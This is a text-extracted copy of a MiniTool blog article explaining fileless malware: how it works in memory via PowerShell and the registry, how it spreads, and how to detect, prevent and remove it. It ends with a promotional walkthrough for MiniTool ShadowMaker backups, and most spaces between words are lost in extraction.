1. Title: [Review] Fileless Malware: Definition/Detection/Affect/Removal
Keywords: filelessmalware,whatisfilelessmalware,filelessmalwaredetection,how toremove
filelessmalware, filelessmalwareattacks,how doesfilelessmalware work,filelessmalware
protection
Description: What’s fileless malware? How does fileless malware work? How to detect fileless
malware? How to remove fileless malware? Get answers here!
URL: https://www.minitool.com/backup-tips/fileless-malware.html
Summary: This article written by MiniTool organization reviews carefully a type of non-file
malicious software - fileless malware. After reading the below content, you will know the meaning,
working strategy,detection, protection, and removment of the fileless malware.
What Is Fileless Malware?
Filelessmalware isavariantof computer-relatedmalicioussoftware thatexistsexclusivelyasa
memory-basedartifact, random-accessmemory (RAM) forexample.
Fileless Malware Detection
What makesfilelessinfectionssoinsidiousisalsowhatmakesthemsoeffective.There are also
sayingsthatfilelessmalware is“undetectable”.Thisisnotliterallytrue;itjustmeansthatfileless
infectionisusuallyundetectable byantivirus,whitelisting,andothertraditional endpointsecurity
programs.
Tip: The Ponemon Institutesaysthatfilelessattacksare 10 times more likely to succeed than file-
based attacks.
How to detectfilelessmalware? The filelessmalware doesn’twriteanythingaboutitsactivitytothe
computer’sharddrives.Thus, itisveryresistanttoexistinganti-computerforensicstrategiesthat
2. include hardware verification, pattern-analysis,signature detection,time-stamping,file-based
whitelist,andsoon.
Filelessmalware leavesverylittle wayof evidence thatcanbe usedby digital forensicinvestigators
to identifyillegitimate activity.Asthiskindof malware isdesignedtoworkin memory,itcan persist
on the operatingsystem(OS) until the systemisrebooted.
Fileless Malware Attacks
On Feb.8, 2017, a reportpublishedbyKasperskyLab’sGlobal ResearchandAnalysisTeamnamed
“FilelessAttacksAgainstEnterprise Networks”involvesinfilelessmalwareanditsnewestvariants.
The report saysthat filelessmalwareinfectsabout140 enterprise networksall overthe world
includingtelecommunicationenterprises,governmentorganizations,andbanks.
The report alsoshowshowa filelessmalware variantperformsanattackagainsta target computer
relyingon PowerShell scripts,whichlocateswithinthe WindowsRegistry.Itleveragesacommon
attack frameworknamedMetasploitwithsupportingattacktoolslike Mimikatzandstandard
Windowsutilitieslike “NETSH”and“SC” to assistwithlateral movement.
Thisfilelessmalware was onlyfoundafterabank identifiedthe MetasploitMeterpretercode
runninginphysical memoryona central domaincontroller(DC).
BesidesKaspersky,manyothercomputersecurityprogramcompaniesalsoidentifiedfileless
malware,suchas MacAfee,Symantec,TrendMicro,Cybereason…
https://www.minitool.com/backup-tips/mcafee-vs-norton.html
Fileless Malware vs In-memory Malware
Sometimes,filelessmalware isconsideredsynonymouswithin-memorymalware forbothof them
implementtheirmainfunctionswithoutwritingdatato harddriveswithinthe whole lifeof their
operation.
Therefore,some peoplethinkthisvariantisnothingnew butaredefinitionof the well-known
“memoryresidentvirus”,whosepedigreecanbe tracedback to the birthof the LehighVirus(inthe
1980s) that was developedbythe originatorof the term, FredCohen,andbecame famouswithhis
paperon the topic.
However,tobe exact,the “filelessmalware”isnotthe synonymyof “in-memorymalware”though
theyhave the same executionenvironment –systemmemory.Theydohave differentiation.The
biggestdifferencebetweenfilelessmalware andin-memorymalware isthe methodof inceptionand
prolongation.
Most malware’sinfectionvectorwillwrite somethingtothe disksforitself tobe executed.The origin
of the malware canrelyon the form of external mediadeviceslike USBflash drives,mobile phones,
attachments,side-channel,browserdrive-by,etc.
Eitherin-memorymalwareormemory-residentmalware hastohave contact withthe hard disksin
the host computerinsome formor another.Therefore,evenemployingthe stealthiestanti-forensic
methods,some formof infectedresiduewillbe leftonthe harddrives.
Yet,as for filelessmalware,fromthe inceptionuntilthe termination(usuallybysystemreboot),it
aimsneverto write itscontentsonhard drives.Filelessmalware aimstoreside involatileOSareas
includingin-memoryprocesses, registry,aswell asservice areas.
3. https://www.minitool.com/news/windows-reboot-vs-reset-vs-restart-009.html
How Does Fileless Malware Work?
Filelessmalware isanevolutionarystrainof virusthathastakenon a steadymodel of self-
improvementorself-enhancementwithadrive towardsclearlydefinedandfocusedattack
scenarios.Itsrootscan be tracedback to the memory-resident(terminate-and-stay-resident) virtual
programs.
Once those virtual programswere launched,the filelessmalware will resideinmemoryawaitinga
systeminterruptbefore gettingaccesstotheircontrol flow.There are some filelessmalware
exampleslike The DardAvenger,Numberof the Beast,andFrodo.
Fileless Malware Common Technologies/Types
Memory-onlymalware
Registryresidentmalware
Fileless ransomware
Exploitkits
Steal credentials
Hijacknative programs
Those technologiesevolvedbywayof temporarymemory-residentviruses;MonxlaandAnthrax are
famousforadoptingthose techniques.Those technologiestake ontheirtruer“fileless”nature by
wayof in-memoryinjectednetworkwormsorviruseslike SlammerandCodeRed.
Tip: More modern evolutionary filelessmalwareincludesPoweliks,Duqu,Phasebot,and Stuxnet.
Fileless Malware Attack Process
Filelessattacksbelongtolow-observablecharacteristics(LOC) attacks,whichisatype of stealth
attack that evadesdetectionbymostanti-malwareandfrustratesforensicanalysisefforts. Insteadof
workingincommonhard drive files,filelessmalware operatesincomputermemory.
Withoutdirectlyinstallingonthe hostor beingcontainedinafile,filelessvirusesdirectlygointo
systemmemory.ByhackingPowerShell,itcanaccess justaboutanythinginWindows.
Belowisan example processforfilelessattack:
Step1. User clickson a linkinspam email.
Step2. Website loadsflashandtriggersexploit.
Step3. Shellcode runsPowerShell with CMDline todownloadandexecutethe payloadinmemory
only.
Step4. Downloadan in-memoryexecutionandreflectivelyloadcode. The payloadcanperform
exfiltration,damage,etc.
Step5. Create an auto-startregistryto invoke PowerShellwith aCMD line.
Fileless Malware Spreading Process
Filelessattacksare typicallyusedforlateral movement.Theyspreadfromone computertoanother
to obtainaccessto valuable dataacross the enterprise network.
To avoidsuspicion,filelessmalware goesintothe innerpartsof trustedandwhitelistedprocesses
such as PowerShell,wscript.exe,andcscript.exe orthe OSitself toimplementmaliciousprocesses.
4. Most automatedmalware scanscan’t detectcommandline changes.Althoughatrainedanalystcan
identifythose scripts,he usuallydoesnotknow where tocheckfor them.
Step1. Get access byremotelyexploitingavulnerabilityandusingwebscriptingforremote access.
Step2. Steal credentialsinthe same method.
Step3. Maintainpersistence bymodifying the registrytocreate a backdoor.
Step4. Steal data using the file systemandbuilt-incompressionutilities.Then, uploaddatafromthe
infectedcomputerviaFTP.
https://www.minitool.com/backup-tips/powershell-exe-virus.html
Fileless Malware Protection
How to AvoidBeingInfectedbyFilelessMalware? Since filelessmalware ishardtodetectand
therefore more difficulttoremove,you’dbetterstopitfromsuccessfullyattackingyourmachine
and keepitoutof yourcomputer.Then,how to achieve that?
#1 Don’t Open Malicious Links and Files
Regardingthe processof filelessattacks,one of the effective waysistoavoidclickingonunknown
linksfromspamemail orunsecuredwebsites.Also,you’dbetternotopenattachmentsfrom
unknownsenders.
#2 Keep Your Software Up to Date
Secondly,alwayskeepyourprogramsof the newestversionisanotherwaytodefendagainstfileless
attacks,especiallyforMicrosoftapplications.
Tip: Microsoft365 suite containssecuritymeasuresand WindowsDefenderhasalso upgraded to
detect the irregularactivity of PowerShell.
#3 Use Security Programs and Firewall
If you can’t ensure computersecuritybyyourself,youshouldrelyonsecuritysolutions,either
systembuilt-inprogramsorthird-partyones.Nomatterwhichone yourselect,youshouldmake
sure that it buildsanintegrated andmulti-layeredapproachthataddressesthe entire threat
lifecycle. Thus,youcaninvestigate everyphase of the campaignbefore,during,andafter anattack.
Be able tosee and measure whatishappening
Control the state of the targetedsystem
How to Remove Fileless Malware?
Filelessmalware isakindof malware thatmakesuse of legitimate applicationstoinfectcomputers.
It reliesonnofilesandleavesnofootprint.Thus,itisdifficulttodetectandremove the fileless
malware.
#1 Rely on Powerful Security Software
Filelessmalware hasbeeneffective inevadingall butthe mostsophisticatedsecuritysolutions,such
as McAfee EndpointSecurity,Norton360,CrowdStrike,andVaronis.So,if youare unfortunately
affectedbyfilelessmalware,youcanchoose one of themor anotheranti-malwaretohelpyou
remove filelessmalware.
5. #2 Reboot Windows
Also,justas describedinthe formerpartof thisarticle,youcan try to rebootyoursystemto getrid
of filelessmalware.
#3 Clean System Memory
If you choose to cleancomputermemorytodo filelessmalware removal,youneedtobe prepared
for a freshstart.Actually,justresetWindowstofactorydefaultsettingsor reinstall the systemcan
helpyourebuildyourmemory.
Note:Before factory resetor systemreinstallation,do backup yourcrucial data.
https://www.minitool.com/news/how-to-clean-ram-021.html
How to Save Data from Lost During Fileless Malware Attack?
Since itis difficulttodetectanddelete filelessmalware once itgetsintoyourcomputer,youshould
take some actionswhenyouare still unaffectedbyfilelessattacks.Besidesthe methodstoavoid
beinginfectedbyfilelessmalware mentionedabove,anotherimportanttaskyouneedtocomplete
isto back up vital filesonyourcomputer.
Once you have a backupof importantfiles,evenif youlose themwhileremovingfilelessmalware by
computerhard reset,youcan still restore themfromthe backupimage.Tocreate a backup of crucial
items,youare recommendedtorelyona professionalandreliable programsuchas MiniTool
ShadowMaker.
Step1. Downloadandinstall MiniTool ShadowMakeronyourcomputer.
Step2. Openit and click KeepTrial if you are askedto buy.
Step3. Click Backup inthe topmenuof the maininterface.
Step4. Clickthe Source module inthe Backuptab and selectwhichfilesorprogramsyouwantto
back up.You can alsochoose to back up the system,a partition/volume,orawhole harddrive.
Step4. Clickthe Destination module toselectwhere you’dlike tostore the backupimage file.
External storage space isrecommended.
Step5. Previewthe backupprocessandconfirmitby clickingthe Backup up Now button.
6. Alt=MiniTool ShadowMakerBackup Files
It will popupaskingforyour confirmationagain,justapprove it.Then,waituntil itfinishesoryou
can switchto otherbusinesseswhile itisprocessing.
That is all aboutfilelessmalware.If youwanttolearnmore relatedtofilelessmalware orattacks,
youcan viewthe belowFAQorsearchon thiswebsite;if youhave anyideaaboutfilelessmalwareor
otherviruses,youcanleave a commentbelow;if youcome acrossany problemwhile using MiniTool
ShadowMaker,feel freetocontactvia support@minitool.com.
Fileless Malware FAQ
Is PowerShell safe?
PowerShell isgenerallyasecure applicationthatisdevelopedandmaintainedbyMicrosoft.Itis
becomingsaferunderthe continuousupdate.Whensettoits AllSignedexecutionpolicy,onlyscripts
signedbyan identifiable authorare able torun onPowerShell.Anyhow,PowerShell ismuchsafer
than manyotherprograms.
ShouldI disable PowerShell?
No,you are not recommendedtodisablePowerShell.DisablingPowerShell reducesthe capabilityto
monitorandmanage your systemenvironmentandmakesyourcomputermore vulnerableto
hackersor malware.
What is sophisticatedmalware?
7. Sophisticatedmalware attacksusuallyfeature the usage of acommand-and-control serverthat
allowsthreatactorsto communicate withthe attackedOS,exfiltratecrucial data,andevencontrol
the infectedcomputerremotely.